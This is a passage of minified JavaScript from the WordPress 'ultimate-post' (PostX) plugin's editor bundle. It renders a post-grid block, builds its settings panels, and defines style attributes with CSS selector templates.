Features","ultimate-post"),new:a.KE,[Ve?"exclude":"dep"]:a.N2}],store:tt}),(0,o.createElement)("div",ot,lt&&(0,o.createElement)("style",{dangerouslySetInnerHTML:{__html:lt}}),(0,o.createElement)("div",{className:"ultp-block-wrapper"},(V||G||F)&&(0,o.createElement)(r.Z,{attributes:N,setAttributes:l,onClick:()=>{Xe("heading"),Qe("heading")},setSection:Xe,setToolbarSettings:Qe}),function(){const t=`${Ie}`,a=(e,t)=>(0,h.o6)()&&Q&&(0,o.createElement)(k.Z,{idx:e,postId:t,fields:X,settingsOnClick:(e,t)=>{e?.stopPropagation(),Qe(t)},selectedDC:Ge.selectedDC,setSelectedDc:Je,setAttributes:l,dcFields:X});return Ge.error?(0,o.createElement)(I,{label:__("Posts are not available.","ultimate-post")},(0,o.createElement)("div",{style:{marginBottom:15}},__("Make sure Add Post.","ultimate-post"))):Ge.loading?(0,o.createElement)(I,{className:"ultp-backend-block-loading",label:__("Loading…","ultimate-post")},(0,o.createElement)(L,null)):Ge.postsList.length>0?(0,o.createElement)("div",{className:`ultp-block-items-wrap ultp-block-row ultp-${Ee} ultp-block-column${le}`},Ge.postsList.map(((l,r)=>{const p=0==r?JSON.parse(ye.replaceAll("u0022",'"')):JSON.parse(be.replaceAll("u0022",'"'));return(0,o.createElement)(t,{key:r,className:`ultp-block-item post-id-${l.ID} ${Se?"ultp-animation-"+Se:""}`},(0,o.createElement)("div",{className:"ultp-block-content-wrap ultp-block-content-overlay"},(0,o.createElement)(s.zk,{imgOverlay:ge,imgOverlayType:me,imgAnimation:de,post:l,fallbackEnable:Re,vidIconEnable:Fe,catPosition:ce,imgCropSmall:De,showImage:ne,imgCrop:ze,idx:r,showSmallCat:ve,Category:0!=r&&!ve||"aboveTitle"==ce?null:(0,o.createElement)("div",{className:"ultp-category-img-grid"},(0,o.createElement)(i.Z,{post:l,catShow:ie,catStyle:pe,catPosition:ce,customCatColor:Pe,onlyCatColor:Le,onClick:e=>{Xe("taxonomy-/-category"),Qe("cat")}})),onClick:()=>{Xe("image"),Qe("image")}}),Fe&&l.has_video&&(0,o.createElement)(s.nk,{onClick:()=>{Xe("video"),Qe("video")}}),(0,o.createElement)("div",{className:`ultp-block-content ultp-block-content-${we}`},(0,o.createElement)("div",{className:"ultp-block-content-inner"},a(7,l.ID),"aboveTitle"==ce&&(0==r||ve)&&(0,o.createElement)(i.Z,{post:l,catShow:ie,catStyle:pe,catPosition:ce,customCatColor:Pe,onlyCatColor:Le,onClick:e=>{Xe("taxonomy-/-category"),Qe("cat")}}),a(6,l.ID),l.title&&se&&1==ue&&(0,o.createElement)(g.Z,{title:l.title,headingTag:Be,titleLength:Me,titleStyle:Ne,onClick:e=>{Xe("title"),Qe("title")}}),a(5,l.ID),(0==r||he)&&ae&&"top"==_e&&(0,o.createElement)(c.Z,{meta:p,post:l,metaSeparator:re,metaStyle:oe,metaMinText:Ae,metaAuthorPrefix:He,metaDateFormat:je,authorLink:Ze,onClick:e=>{Xe("meta"),Qe("meta")}}),a(4,l.ID),l.title&&se&&0==ue&&(0,o.createElement)(m.Z,{readMoreText:ke,readMoreIcon:ee,titleLabel:l.title,onClick:()=>{Xe("read-more"),Qe("read-more")}}),a(3,l.ID),(0==r||Te)&&Oe&&(0,o.createElement)(n.Z,{excerpt:l.excerpt,excerpt_full:l.excerpt_full,seo_meta:l.seo_meta,excerptLimit:te,showFullExcerpt:Ce,showSeoMeta:Ue,onClick:e=>{Xe("excerpt"),Qe("excerpt")}}),a(2,l.ID),(0==r||xe)&&fe&&(0,o.createElement)(m.Z,{readMoreText:ke,readMoreIcon:ee,titleLabel:l.title,onClick:()=>{Xe("read-more"),Qe("read-more")}}),a(1,l.ID),(0==r||he)&&ae&&"bottom"==_e&&(0,o.createElement)(c.Z,{meta:p,post:l,metaSeparator:re,metaStyle:oe,metaMinText:Ae,metaAuthorPrefix:He,metaDateFormat:je,authorLink:Ze,onClick:e=>{Xe("meta"),Qe("meta")}}),a(0,l.ID),(0,h.o6)()&&Q&&(0,o.createElement)(f.Z,{dcFields:X,setAttributes:e.setAttributes,startOnboarding:Ye,overlayMode:!0,inverseColor:!0})))))}))):(0,o.createElement)(I,{className:"ultp-backend-block-loading",label:We})}(),F&&"loadMore"==q&&(0,o.createElement)(p.Z,{loadMoreText:J,onClick:e=>{Xe("pagination"),Qe("pagination")}}),F&&"navigation"==q&&"topRight"!=$&&(0,o.createElement)(u.Z,{onClick:()=>{Xe("pagination"),Qe("pagination")}}),F&&"pagination"==q&&(0,o.createElement)(d.Z,{paginationNav:K,paginationAjax:W,paginationText:Y,onClick:e=>{Xe("pagination"),Qe("pagination")}}))))}},87402:(e,t,l)=>{"use strict";l.d(t,{FP:()=>v,PR:()=>y,ZP:()=>b});var o=l(67294),a=l(53049),i=l(38156),n=l(13448),r=l(32258),s=l(87282),p=l(92637),c=l(43581),u=l(69735),d=l(82473),m=l(87025);const{__}=wp.i18n,{useEffect:g}=wp.element,y=8,b=e=>{const{store:t}=e,{queryType:l,advFilterEnable:n,advPaginationEnable:r,V4_1_0_CompCheck:{runComp:u}}=t.attributes,{context:d,section:y,settingTab:b,setSettingTab:v}=t;return g((()=>{(0,m.CH)(d,n,t,r)}),[n,r,t.clientId]),(0,o.createElement)(o.Fragment,null,(0,o.createElement)(c.default,{prev:"https://www.wpxpo.com/postx/blocks/#demoid6831",store:t}),(0,o.createElement)(p.Sections,{settingTab:b,setSettingTab:v},(0,o.createElement)(p.Section,{slug:"sorting",title:__("Post Sorting","ultimate-post")},(0,o.createElement)(a.lA,{title:"inline",initialOpen:!0,store:t}),(0,o.createElement)(a.T,{initialOpen:!1,store:t,title:__("Include","ultimate-post"),include:s.fL}),(0,o.createElement)(a.T,{initialOpen:!1,store:t,title:__("Exclude","ultimate-post"),include:s.M6}),(0,o.createElement)(a.T,{initialOpen:!1,store:t,title:__("inline","ultimate-post"),include:[{position:1,data:{type:"select",key:"queryUnique",label:__("Unique Content Group (Frontend Only)","ultimate-post"),pro:!0,options:[{value:"",label:__("Disable","ultimate-post")},{value:"group1",label:__("Content Group 1","ultimate-post")},{value:"group2",label:__("Content Group 2","ultimate-post")},{value:"group3",label:__("Content Group 3","ultimate-post")},{value:"group4",label:__("Content Group 4","ultimate-post")},{value:"group5",label:__("Content Group 5","ultimate-post")}],help:__("Unique Content Group solves the repetition of posts on multiple blocks.[Frontend Only]","ultimate-post")}}]})),(0,o.createElement)(p.Section,{slug:"setting",title:__("Settings","ultimate-post")},(0,o.createElement)(a.cA,{store:t,initialOpen:y.general,dynamicHelpText:{select:{key:"queryQuick",popular_post_1_day_view:"- Most viewed posts published in the last 24 hours",popular_post_7_days_view:"- Most viewed posts published in the last 7 days",popular_post_30_days_view:"- Most viewed posts published in the last 30 days",popular_post_all_times_view:"- Most viewed posts of all time"}},include:[{position:0,data:{type:"layout",block:"post-grid-3",key:"layout",label:__("Layout","ultimate-post"),options:[{img:"assets/img/layouts/pg3/l1.png",label:__("Layout 1","ultimate-post"),value:"layout1",pro:!1},{img:"assets/img/layouts/pg3/l2.png",label:__("Layout 2","ultimate-post"),value:"layout2",pro:!0},{img:"assets/img/layouts/pg3/l3.png",label:__("Layout 3","ultimate-post"),value:"layout3",pro:!0},{img:"assets/img/layouts/pg3/l4.png",label:__("Layout 4","ultimate-post"),value:"layout4",pro:!0},{img:"assets/img/layouts/pg3/l5.png",label:__("Layout 5","ultimate-post"),value:"layout5",pro:!0}]}},{position:4,data:{type:"range",key:"column",label:__("Columns","ultimate-post"),min:1,max:3,step:1}},{position:5,data:{type:"range",key:"overlayHeight",min:0,max:1e3,step:1,unit:!0,responsive:!0,label:__("Height","ultimate-post")}}],exclude:["columns"]}),(0,o.createElement)(a.VH,{isTab:!0,store:t,depend:"titleShow",initialOpen:y.title,include:[{position:5,data:{type:"typography",key:"titleLgTypo",label:__("Typography Large Title","ultimate-post")}}],hrIdx:[4,10]}),(0,o.createElement)(a.Hn,{isTab:!0,store:t,initialOpen:y.image,include:[{data:{type:"toggle",key:"fallbackEnable",label:__("Fallback Image Enable","ultimate-post")}},{data:{type:"media",key:"fallbackImg",label:__("Fallback Image","ultimate-post")}}],exclude:["imgMargin","imageScale","imgWidth","imgHeight"],hrIdx:[{tab:"settings",hr:[3,11]},{tab:"style",hr:[4]}]}),(0,o.createElement)(a.Yk,{isTab:!0,store:t,depend:"metaShow",initialOpen:y.meta,include:[{position:0,data:{type:"toggle",key:"showSmallMeta",label:__("Small Item Meta","ultimate-post")}}],hrIdx:[{tab:"settings",hr:[4]},{tab:"style",hr:[7]}]}),(0,o.createElement)(a.Bq,{isTab:!0,initialOpen:y["taxonomy-/-category"],depend:"catShow",store:t,include:[{position:0,data:{tab:"settings",type:"toggle",key:"showSmallCat",label:__("Small Item Category","ultimate-post")}}],hrIdx:[{tab:"style",hr:[8]}]}),(0,o.createElement)(a.X_,{isTab:!0,depend:"excerptShow",initialOpen:y.excerpt,store:t,include:[{position:0,data:{type:"toggle",key:"showSmallExcerpt",label:__("Small Item Excerpt","ultimate-post")}}]}),(0,o.createElement)(a.oY,{isTab:!0,store:t,initialOpen:y["read-more"],depend:"readMore",include:[{position:0,data:{type:"toggle",tab:"settings",key:"showSmallBtn",label:__("Small Item Read More","ultimate-post")}}]}),(0,o.createElement)(a.rS,{initialOpen:y.video,depend:"vidIconEnable",store:t}),(0,o.createElement)(a.fm,{store:t,include:a.aG}),!u&&(0,o.createElement)(i.Z,{open:y.filter||y.pagination||y.heading},(0,o.createElement)(a.Wh,{isTab:!0,initialOpen:y.heading,depend:"headingShow",store:t}),"posts"!=l&&"customPosts"!=l&&(0,o.createElement)(a.B0,{isTab:!0,store:t,initialOpen:y.filter,depend:"filterShow",hrIdx:[{tab:"settings",hr:[5]},{tab:"style",hr:[4,9]}]}),(0,o.createElement)(a.ng,{isTab:!0,store:t,initialOpen:y.pagination,depend:"paginationShow",hrIdx:[{tab:"style",hr:[4]}]}))),(0,o.createElement)(p.Section,{slug:"advanced",title:__("Advanced","ultimate-post")},(0,o.createElement)(a.yB,{initialOpen:!0,store:t,include:[{position:2,data:{type:"color",key:"loadingColor",label:__("Loading Color","ultimate-post"),pro:!0}}]}),(0,o.createElement)(a.Mg,{store:t}),(0,o.createElement)(a.iv,{store:t}))),(0,a.dH)())};function v({selected:e,store:t}){const{V4_1_0_CompCheck:{runComp:l}}=t.attributes,{metaShow:i,titleShow:s,catPosition:p,titlePosition:c,excerptShow:m,readMore:g,metaPosition:y,catShow:b}=t.attributes,v=[i&&"bottom"==y,g,m,s&&0==c,i&&"top"==y,s&&1==c,b&&"aboveTitle"==p];if((0,u.o6)()&&e.startsWith("dc_"))return(0,o.createElement)(d.Z,{store:t,selected:e,layoutContext:v});switch(e){case"filter":return l?null:(0,o.createElement)(r.Z,{text:"Filter"},(0,o.createElement)(a.sT,{store:t,attrKey:"fliterTypo",label:__("Filter Typography","ultimate-post")}),(0,o.createElement)(n.Z,{buttonContent:a.HT,include:(0,a.Eo)({include:["fliterSpacing","fliterPadding"],exclude:"__all",title:__("Filter Spacing","ultimate-post")}),store:t,label:__("Filter Spacing","ultimate-post")}),(0,o.createElement)(a.b0,{store:t,settingsTitle:__("Filter Settings","ultimate-post"),styleTitle:__("Filter Style","ultimate-post"),settingsKeys:a.Df,styleKeys:a.YF,oArgs:a.rx,exStyle:["fliterTypo","fliterSpacing","fliterPadding"]}));case"heading":return l?null:(0,o.createElement)(r.Z,{text:"Heading"},(0,o.createElement)(a.b0,{store:t,settingsTitle:__("Heading Settings","ultimate-post"),styleTitle:__("Heading Style","ultimate-post"),settingsKeys:a.cM,styleKeys:a.J5,oArgs:a.ii}));case"pagination":return l?null:(0,o.createElement)(r.Z,{text:"Pagination"},(0,o.createElement)(a.sT,{store:t,attrKey:"pagiTypo",label:__("Pagination Typography","ultimate-post")}),(0,o.createElement)(n.Z,{buttonContent:a.HT,include:(0,a.DU)({include:["pagiMargin","pagiPadding"],exclude:"__all",title:__("Pagination Spacing","ultimate-post")}),store:t,label:__("Pagination Spacing","ultimate-post")}),(0,o.createElement)(a.b0,{store:t,settingsTitle:__("Pagination Settings","ultimate-post"),styleTitle:__("Pagination Style","ultimate-post"),settingsKeys:a.V2,styleKeys:a.xd,oArgs:a.YZ,exStyle:["pagiTypo","pagiMargin","pagiPadding"]}));case"video":return(0,o.createElement)(r.Z,{text:"Video"},(0,o.createElement)(n.Z,{buttonContent:a.gA,include:(0,a.q7)({include:["popupIconColor","popupHovColor","popupTitleColor","closeIconColor","closeHovColor"],exclude:"__all",title:__("Video Icon Color","ultimate-post")}),store:t,label:__("Video Icon Color","ultimate-post")}),(0,o.createElement)(n.Z,{buttonContent:a.HU,include:(0,a.q7)({exclude:["popupIconColor","popupHovColor","popupTitleColor","closeIconColor","closeHovColor"]}),store:t,label:__("Video Settings","ultimate-post")}));case"title":return(0,o.createElement)(r.Z,{text:"Title"},(0,o.createElement)(n.Z,{buttonContent:a.tj,include:(0,a.Wf)({include:["titleTypo",{data:{type:"typography",key:"titleLgTypo",label:__("Typography Large Title","ultimate-post")}}],exclude:"__all",title:__("Title Typography","ultimate-post")}),store:t,label:__("Title Typography","ultimate-post")}),(0,o.createElement)(n.Z,{buttonContent:a.gA,include:(0,a.Wf)({include:["titleColor","titleHoverColor","titleBackground"],exclude:"__all",title:__("Title Color","ultimate-post")}),store:t,label:__("Title Color","ultimate-post")}),(0,o.createElement)(n.Z,{buttonContent:a.HU,include:(0,a.Wf)({exclude:["titleBackground","titleTypo","titleColor","titleHoverColor","titleLgTypo"],title:__("Title Settings","ultimate-post")}),store:t,label:__("Title Settings","ultimate-post")}));case"excerpt":return(0,o.createElement)(r.Z,{text:"Excerpt"},(0,o.createElement)(a.sT,{store:t,attrKey:"excerptTypo",label:__("Excerpt Typography","ultimate-post")}),(0,o.createElement)(n.Z,{buttonContent:a.gA,include:(0,a.BO)({include:["excerptColor"],exclude:"__all",title:__("Excerpt Color","ultimate-post")}),store:t,label:__("Excerpt Color","ultimate-post")}),(0,o.createElement)(n.Z,{buttonContent:a.HU,include:(0,a.BO)({exclude:["excerptTypo","excerptColor"],include:[{position:0,data:{type:"toggle",key:"showSmallExcerpt",label:__("Small Item Excerpt","ultimate-post")}}],title:__("Excerpt Settings","ultimate-post")}),store:t,label:__("Excerpt Settings","ultimate-post")}));case"meta":return(0,o.createElement)(r.Z,{text:"Meta"},(0,o.createElement)(a.sT,{store:t,attrKey:"metaTypo",label:__("Meta Typography","ultimate-post")}),(0,o.createElement)(n.Z,{buttonContent:a.HT,include:(0,a.cr)({include:["metaSpacing","metaMargin","metaPadding"],exclude:"__all",title:__("Meta Spacing","ultimate-post")}),store:t,label:__("Meta Spacing","ultimate-post")}),(0,o.createElement)(n.Z,{buttonContent:a.Cz,include:(0,a.cr)({include:a._y,exclude:"__all",title:__("Meta Texts","ultimate-post")}),store:t,label:__("Meta Texts","ultimate-post")}),(0,o.createElement)(a.b0,{store:t,settingsTitle:__("Meta Settings","ultimate-post"),styleTitle:__("Meta Style","ultimate-post"),settingsKeys:a.G7,styleKeys:a.hd,oArgs:a.jK,incSettings:[{position:0,data:{type:"toggle",key:"showSmallMeta",label:__("Small Item Meta","ultimate-post")}}],exSettings:["metaListSmall"],exStyle:["metaTypo","metaMargin","metaPadding","metaSpacing"]}));case"read-more":return(0,o.createElement)(r.Z,{text:"Read More"},(0,o.createElement)(a.sT,{store:t,attrKey:"readMoreTypo",label:__("Read More Typography","ultimate-post")}),(0,o.createElement)(n.Z,{buttonContent:a.HT,include:(0,a.NJ)({include:["readMoreSacing","readMorePadding"],exclude:"__all",title:__("Read More Spacing","ultimate-post")}),store:t,label:__("Read More Spacing","ultimate-post")}),(0,o.createElement)(a.b0,{store:t,settingsTitle:__("Read More Settings","ultimate-post"),styleTitle:__("Read More Style","ultimate-post"),settingsKeys:a.qM,styleKeys:a.ad,oArgs:a.e5,incSettings:[{position:0,data:{type:"toggle",key:"showSmallBtn",label:__("Small Item Read More","ultimate-post")}}],exStyle:["readMoreTypo","readMoreSacing","readMorePadding"]}));case"cat":return(0,o.createElement)(r.Z,{text:"Taxonomy/Category"},(0,o.createElement)(a.sT,{store:t,attrKey:"catTypo",label:__("Category Typography","ultimate-post")}),(0,o.createElement)(n.Z,{buttonContent:a.HT,include:(0,a.v9)({include:["catSacing","catPadding"],exclude:"__all",title:__("Category Spacing","ultimate-post")}),store:t,label:__("Category Spacing","ultimate-post")}),(0,o.createElement)(a.b0,{store:t,settingsTitle:__("Category Settings","ultimate-post"),styleTitle:__("Category Style","ultimate-post"),settingsKeys:a.eC,styleKeys:a.EK,oArgs:a.op,incSettings:[{position:0,data:{type:"toggle",key:"showSmallCat",label:__("Small Item Category","ultimate-post")}}],exStyle:["catTypo","catSacing","catPadding"]}));case"image":return(0,o.createElement)(r.Z,{text:"Image"},(0,o.createElement)(a.b0,{store:t,settingsTitle:__("Image Settings","ultimate-post"),styleTitle:__("Image Style","ultimate-post"),settingsKeys:a.pj,styleKeys:a.hH,oArgs:a.Po,exStyle:["imgMargin","imageScale","imgWidth","imgHeight"],exSettings:["imgMargin","imageScale","imgWidth","imgHeight"],incSettings:[{data:{type:"toggle",key:"fallbackEnable",label:__("Fallback Image Enable","ultimate-post")}},{data:{type:"media",key:"fallbackImg",label:__("Fallback Image","ultimate-post")}}]}));default:return null}}},62308:(e,t,l)=>{"use strict";l.d(t,{Z:()=>n});var o=l(92165),a=l(73151),i=l(51579);const n={blockId:{type:"string",default:""},previewImg:{type:"string",default:""},currentPostId:{type:"string",default:""},layout:{type:"string",default:"layout1"},headingShow:{type:"boolean",default:!0},excerptShow:{type:"boolean",default:!1},showImage:{type:"boolean",default:!0},filterShow:{type:"boolean",default:!1,style:[{depends:[{key:"queryType",condition:"!=",value:["posts","customPosts"]}]}]},paginationShow:{type:"boolean",default:!1},contentTag:{type:"string",default:"div"},openInTab:{type:"boolean",default:!1},notFoundMessage:{type:"string",default:"No Post Found"},metaKey:{type:"string",default:"custom_meta_key",style:[{depends:[{key:"queryOrderBy",condition:"==",value:"meta_value_num"}],0:{key:"queryType",condition:"!=",value:["customPosts","posts","archiveBuilder"]}}]},queryNumber:{type:"string",default:5,style:[{depends:[{key:"layout",condition:"==",value:["layout1","layout2"]},{key:"queryType",condition:"!=",value:["customPosts","posts","archiveBuilder"]}]}]},titleShow:{type:"boolean",default:!0},titleStyle:{type:"string",default:"none"},titleAnimColor:{type:"string",default:"black",style:[{depends:[{key:"titleStyle",condition:"==",value:"style1"}],selector:"{{ULTP}} .ultp-title-style1 a {  cursor: pointer; text-decoration: none; display: inline; padding-bottom: 2px; transition: all 0.35s linear !important; background: linear-gradient( to bottom, {{titleAnimColor}} 0%, {{titleAnimColor}} 98% );  background-size: 0px 2px; background-repeat: no-repeat; background-position: left 100%; }"},{depends:[{key:"titleStyle",condition:"==",value:"style2"}],selector:"{{ULTP}} .ultp-title-style2 a:hover {  border-bottom:none; padding-bottom: 2px; background-position:0 100%; background-repeat: repeat; background-image: url(\"data:image/svg+xml;charset=utf8,%3Csvg id='squiggle-link' xmlns='http://www.w3.org/2000/svg' xmlns:xlink='http://www.w3.org/1999/xlink' xmlns:ev='http://www.w3.org/2001/xml-events' viewBox='0 0 10 18'%3E%3Cstyle type='text/css'%3E.squiggle%7Banimation:shift .5s linear infinite;%7D@keyframes shift %7Bfrom %7Btransform:translateX(-10px);%7Dto %7Btransform:translateX(0);%7D%7D%3C/style%3E%3Cpath fill='none' stroke='{{titleAnimColor}}' stroke-width='1' class='squiggle' d='M0,17.5 c 2.5,0,2.5,-1.5,5,-1.5 s 2.5,1.5,5,1.5 c 2.5,0,2.5,-1.5,5,-1.5 s 2.5,1.5,5,1.5' /%3E%3C/svg%3E\"); }"},{depends:[{key:"titleStyle",condition:"==",value:"style3"}],selector:"{{ULTP}} .ultp-title-style3 a {  text-decoration: none; $thetransition: all 1s cubic-bezier(1,.25,0,.75) 0s; position: relative; transition: all 0.35s ease-out; padding-bottom: 3px; border-bottom:none; padding-bottom: 2px; background-position:0 100%; background-repeat: repeat; background-image: url(\"data:image/svg+xml;charset=utf8,%3Csvg id='squiggle-link' xmlns='http://www.w3.org/2000/svg' xmlns:xlink='http://www.w3.org/1999/xlink' xmlns:ev='http://www.w3.org/2001/xml-events' viewBox='0 0 10 18'%3E%3Cstyle type='text/css'%3E.squiggle%7Banimation:shift .5s linear infinite;%7D@keyframes shift %7Bfrom %7Btransform:translateX(-10px);%7Dto %7Btransform:translateX(0);%7D%7D%3C/style%3E%3Cpath fill='none' stroke='{{titleAnimColor}}' stroke-width='1' class='squiggle' d='M0,17.5 c 2.5,0,2.5,-1.5,5,-1.5 s 2.5,1.5,5,1.5 c 2.5,0,2.5,-1.5,5,-1.5 s 2.5,1.5,5,1.5' /%3E%3C/svg%3E\"); }"},{depends:[{key:"titleStyle",condition:"==",value:"style4"}],selector:"{{ULTP}} .ultp-title-style4 a { cursor: pointer; font-weight: 600; text-decoration: none; display: inline; padding-bottom: 2px; transition: all 0.3s linear !important; background: linear-gradient( to bottom, {{titleAnimColor}} 0%, {{titleAnimColor}} 98% );  background-size: 100% 2px; background-repeat: no-repeat; background-position: left 100%; }"},{depends:[{key:"titleStyle",condition:"==",value:"style5"}],selector:"{{ULTP}} .ultp-title-style5 a:hover{ text-decoration: none; transition: all 0.35s ease-out; border-bottom:none; padding-bottom: 2px; background-position:0 100%; background-repeat: repeat; background-size:auto; background-image: url(\"data:image/svg+xml;charset=utf8,%3Csvg id='squiggle-link' xmlns='http://www.w3.org/2000/svg' xmlns:xlink='http://www.w3.org/1999/xlink' xmlns:ev='http://www.w3.org/2001/xml-events' viewBox='0 0 10 18'%3E%3Cstyle type='text/css'%3E.squiggle%7Banimation:shift .5s linear infinite;%7D@keyframes shift %7Bfrom %7Btransform:translateX(-10px);%7Dto %7Btransform:translateX(0);%7D%7D%3C/style%3E%3Cpath fill='none' stroke='{{titleAnimColor}}' stroke-width='1' class='squiggle' d='M0,17.5 c 2.5,0,2.5,-1.5,5,-1.5 s 2.5,1.5,5,1.5 c 2.5,0,2.5,-1.5,5,-1.5 s 2.5,1.5,5,1.5' /%3E%3C/svg%3E\"); } "},{depends:[{key:"titleStyle",condition:"==",value:"style5"}],selector:"{{ULTP}} .ultp-title-style5 a { cursor: pointer; text-decoration: none; display: inline; padding-bottom: 2px; transition: all 0.3s linear !important; background: linear-gradient( to bottom, {{titleAnimColor}} 0%, {{titleAnimColor}} 98% );  background-size: 100% 2px; background-repeat: no-repeat; background-position: left 100%; }"},{depends:[{key:"titleStyle",condition:"==",value:"style6"}],selector:"{{ULTP}} .ultp-title-style6 a{ background-image: linear-gradient(120deg, {{titleAnimColor}} 0%, {{titleAnimColor}} 100%); background-repeat: no-repeat; background-size: 100% 2px; background-position: 0 88%; transition: background-size 0.15s ease-in; padding: 5px 5px; }"},{depends:[{key:"titleStyle",condition:"==",value:"style7"}],selector:"{{ULTP}} .ultp-title-style7 a { cursor: pointer; text-decoration: none; display: inline; padding-bottom: 2px; transition: all 0.3s linear !important; background: linear-gradient( to bottom, {{titleAnimColor}} 0%, {{titleAnimColor}} 98% );  background-size: 0px 2px; background-repeat: no-repeat; background-position: right 100%; } "},{depends:[{key:"titleStyle",condition:"==",value:"style8"}],selector:"{{ULTP}} .ultp-title-style8 a { cursor: pointer; text-decoration: none; display: inline; padding-bottom: 2px; transition: all 0.3s linear !important; background: linear-gradient( to bottom, {{titleAnimColor}} 0%, {{titleAnimColor}} 98% );  background-size: 0px 2px; background-repeat: no-repeat; background-position: center 100%; } "},{depends:[{key:"titleStyle",condition:"==",value:"style9"}],selector:"{{ULTP}} .ultp-title-style9 a { background-image: linear-gradient(120deg,{{titleAnimColor}} 0%, {{titleAnimColor}} 100%); background-repeat: no-repeat; background-size: 100% 10px; background-position: 0 88%; transition: 0.3s ease-in; padding: 3px 5px; } "}]},titleTag:{type:"string",default:"h3"},titleAnimation:{type:"string",default:""},titlePosition:{type:"boolean",default:!0},titleColor:{type:"string",default:"#fff",style:[{depends:[{key:"titleShow",condition:"==",value:!0}],selector:"{{ULTP}} .ultp-block-content .ultp-block-title a { color:{{titleColor}} !important; }"}]},titleHoverColor:{type:"string",default:"rgba(255,255,255,0.70)",style:[{depends:[{key:"titleShow",condition:"==",value:!0}],selector:"{{ULTP}} .ultp-block-content .ultp-block-title a:hover { color:{{titleHoverColor}} !important; }"}]},titleLgTypo:{type:"object",default:{openTypography:1,size:{lg:"30",unit:"px"},height:{lg:"36",unit:"px"},decoration:"none",family:"",weight:"700"},style:[{depends:[{key:"titleShow",condition:"==",value:!0},{key:"layout",condition:"!=",value:"layout5"}],selector:"{{ULTP}} .ultp-block-item:first-child .ultp-block-title, \n          {{ULTP}} .ultp-block-item:first-child .ultp-block-title a"},{depends:[{key:"titleShow",condition:"==",value:!0},{key:"layout",condition:"==",value:"layout5"}],selector:"{{ULTP}} .ultp-block-item:first-child .ultp-block-title, \n          {{ULTP}} .ultp-block-item:first-child .ultp-block-title a, \n          {{ULTP}} .ultp-block-item:nth-child(2) .ultp-block-title, \n          {{ULTP}} .ultp-block-item:nth-child(2) .ultp-block-title a"}]},titleTypo:{type:"object",default:{openTypography:1,size:{lg:"20",unit:"px"},height:{lg:"26",unit:"px"},decoration:"none",family:"",weight:"600"},style:[{depends:[{key:"titleShow",condition:"==",value:!0},{key:"layout",condition:"!=",value:"layout5"}],selector:"{{ULTP}} .ultp-block-item:not(:first-child) .ultp-block-title, \n          {{ULTP}} .ultp-block-item:not(:first-child) .ultp-block-title a"},{depends:[{key:"titleShow",condition:"==",value:!0},{key:"layout",condition:"==",value:"layout5"}],selector:"{{ULTP}} .ultp-block-item:not(:first-child):not(:nth-child(2)) .ultp-block-title, \n          {{ULTP}} .ultp-block-item:not(:first-child):not(:nth-child(2)) .ultp-block-title a"}]},titlePadding:{type:"object",default:{lg:{top:10,bottom:5,unit:"px"}},style:[{depends:[{key:"titleShow",condition:"==",value:!0}],selector:"{{ULTP}} .ultp-block-title { padding:{{titlePadding}}; }"}]},titleLength:{type:"string",default:0},titleBackground:{type:"string",default:"",style:[{depends:[{key:"titleShow",condition:"==",value:!0}],selector:"{{ULTP}} .ultp-block-title a { padding: 2px 7px; -webkit-box-decoration-break: clone; box-decoration-break: clone; background-color:{{titleBackground}}; }"}]},imgCrop:{type:"string",default:"yes"==ultp_data.disable_image_size?"full":"ultp_layout_landscape",depends:[{key:"showImage",condition:"==",value:!0}]},imgCropSmall:{type:"string",default:"yes"==ultp_data.disable_image_size?"full":"ultp_layout_square"},imgAnimation:{type:"string",default:"roateLeft"},imgGrayScale:{type:"object",default:{lg:"0",ulg:"%",unit:"%"},style:[{depends:[{key:"showImage",condition:"==",value:!0}],selector:"{{ULTP}} .ultp-block-image img { filter: grayscale({{imgGrayScale}}); }"}]},imgHoverGrayScale:{type:"object",default:{lg:"0",unit:"%"},style:[{depends:[{key:"showImage",condition:"==",value:!0}],selector:"{{ULTP}} .ultp-block-item:hover .ultp-block-image img { filter: grayscale({{imgHoverGrayScale}}); }"}]},imgRadius:{type:"object",default:{lg:"",unit:"px"},style:[{depends:[{key:"showImage",condition:"==",value:!0}],selector:"{{ULTP}} .ultp-block-content-wrap, \n          {{ULTP}} .ultp-block-image { border-radius:{{imgRadius}}; }"}]},imgHoverRadius:{type:"object",default:{lg:"",unit:"px"},style:[{depends:[{key:"showImage",condition:"==",value:!0}],selector:"{{ULTP}} .ultp-block-content-wrap:hover, \n          {{ULTP}} .ultp-block-content-wrap:hover .ultp-block-image { border-radius:{{imgHoverRadius}}; }"}]},imgShadow:{type:"object",default:{openShadow:0,width:{top:1,right:1,bottom:1,left:1},color:"#009fd4"},style:[{depends:[{key:"showImage",condition:"==",value:!0}],selector:"{{ULTP}} .ultp-block-content-overlay"}]},imgHoverShadow:{type:"object",default:{openShadow:0,width:{top:1,right:1,bottom:1,left:1},color:"#009fd4"},style:[{depends:[{key:"showImage",condition:"==",value:!0}],selector:"{{ULTP}} .ultp-block-item:hover .ultp-block-content-overlay"}]},imgOverlay:{type:"boolean",default:!0},imgOverlayType:{type:"string",default:"flat",style:[{depends:[{key:"imgOverlay",condition:"==",value:!0}]}]},overlayColor:{type:"object",default:{openColor:1,type:"color",color:"#0e1523"},style:[{depends:[{key:"imgOverlayType",condition:"==",value:"custom"}],selector:"{{ULTP}} .ultp-block-image-custom > a::before"}]},imgOpacity:{type:"string",default:.7,style:[{depends:[{key:"imgOverlayType",condition:"==",value:"custom"}],selector:"{{ULTP}} .ultp-block-image-custom > a::before { opacity: {{imgOpacity}}; }"}]},fallbackEnable:{type:"boolean",default:!0,style:[{depends:[{key:"showImage",condition:"==",value:!0}]}]},fallbackImg:{type:"object",default:"",style:[{depends:[{key:"showImage",condition:"==",value:!0},{key:"fallbackEnable",condition:"==",value:!0}]}]},imgSrcset:{type:"boolean",default:!1},imgLazy:{type:"boolean",default:!1},showSmallMeta:{type:"boolean",default:!0},metaListSmall:{type:"string",default:'["metaAuthor","metaDate"]'},showSmallCat:{type:"boolean",default:!0},showSeoMeta:{type:"boolean",default:!1},showSmallExcerpt:{type:"boolean",default:!1},showFullExcerpt:{type:"boolean",default:!1,style:[{depends:[{key:"showSeoMeta",condition:"==",value:!1}]}]},excerptLimit:{type:"string",default:10,style:[{depends:[{key:"showFullExcerpt",condition:"==",value:!1}]}]},excerptColor:{type:"string",default:"#fff",style:[{depends:[{key:"excerptShow",condition:"==",value:!0}],selector:"{{ULTP}} .ultp-block-excerpt, {{ULTP}} .ultp-block-excerpt p { color:{{excerptColor}}; 